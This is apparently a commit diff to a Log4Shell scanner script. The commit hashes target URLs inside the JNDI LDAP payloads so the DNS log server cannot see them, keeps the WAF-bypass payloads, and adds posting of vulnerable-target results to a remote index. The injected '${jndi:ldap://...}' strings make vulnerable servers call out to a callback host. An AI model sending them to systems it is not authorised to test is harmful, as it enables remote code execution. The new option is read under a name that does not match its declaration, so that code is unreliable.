fix 不将测试目标的成功信息暴露给dns log Server 2022-07-20

log4j-scan.py

@@ -12,6 +12,7 @@
 import random
 import requests
 import time
+import hashlib
 import sys
 from urllib import parse as urlparse
 import base64
@@ -94,6 +95,10 @@
                     dest="usedlist",
                     help="Check a list of URLs.",
                     action='store')
+parser.add_argument("-rurl", "--resulturl",
+                    dest="url",
+                    help="The url to receive the batch result",
+                    action='store')
 parser.add_argument("--request-type",
                     dest="request_type",
                     help="Request Type: (get, post) - [Default: get].",
@@ -227,9 +232,9 @@ def __init__(self, token="", server=""):
             self.headers['Authorization'] = self.token
         self.secret = str(uuid4())
         self.encoded = b64encode(self.public_key).decode("utf8")
-        guid = uuid4().hex.ljust(33, 'a')
-        guid = ''.join(i if i.isdigit() else chr(ord(i) + random.randint(0, 20)) for i in guid)
-        self.domain = f'{guid}.{self.server}'
+        # guid = uuid4().hex.ljust(33, 'a')
+        # guid = ''.join(i if i.isdigit() else chr(ord(i) + random.randint(0, 20)) for i in guid)
+        self.domain = f'{self.server}'
         self.correlation_id = self.domain[:20]
 
         self.session = requests.session()
@@ -303,16 +308,19 @@ def parse_url(url):
 
 
 def scan_url(url, callback_host):
-    parsed_url = parse_url(url)
+    # print("callback_host == " + callback_host)
+    # parsed_url = parse_url(url)
     random_string = ''.join(random.choice('0123456789abcdefghijklmnopqrstuvwxyz') for i in range(7))
-    payload = '${jndi:ldap://%s.%s/%s}' % (parsed_url["host"], callback_host, random_string)
+    # 不要将自己发现的目标漏洞暴露给 dns server
+    szKey =  hashlib.md5(str(url).encode('utf8')).hexdigest()
+    payload = '${jndi:ldap://%s.%s/%s}' % (szKey, callback_host, random_string)
     payloads = [payload]
     if args.waf_bypass_payloads:
-        payloads.extend(generate_waf_bypass_payloads(f'{parsed_url["host"]}.{callback_host}', random_string))
+        payloads.extend(generate_waf_bypass_payloads(f'{szKey}.{callback_host}', random_string))
 
     if args.cve_2021_45046:
         cprint(f"[•] Scanning for CVE-2021-45046 (Log4j v2.15.0 Patch Bypass - RCE)", "yellow")
-        payloads = get_cve_2021_45046_payloads(f'{parsed_url["host"]}.{callback_host}', random_string)
+        payloads = get_cve_2021_45046_payloads(f'{szKey}.{callback_host}', random_string)
 
     for payload in payloads:
         cprint(f"[•] URL: {url} | PAYLOAD: {payload}", "cyan")
@@ -403,6 +411,11 @@ def main():
         cprint("[•] Targets do not seem to be vulnerable.", "green")
     else:
         cprint("[!!!] Targets Affected", "yellow")
+        if args.resulturl:
+            szData = json.dumps(records)
+            szKey =  hashlib.md5(szData.encode('utf8')).hexdigest()
+            requests.post(args.resulturl + '/scan4all_index/_doc/' + szKey, data=szData, verify=False, headers={"Content-Type": "application/json;charset=UTF-8","User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15"},timeout=(10,15),allow_redirects=False)
+
         for i in records:
             cprint(json.dumps(i), "yellow")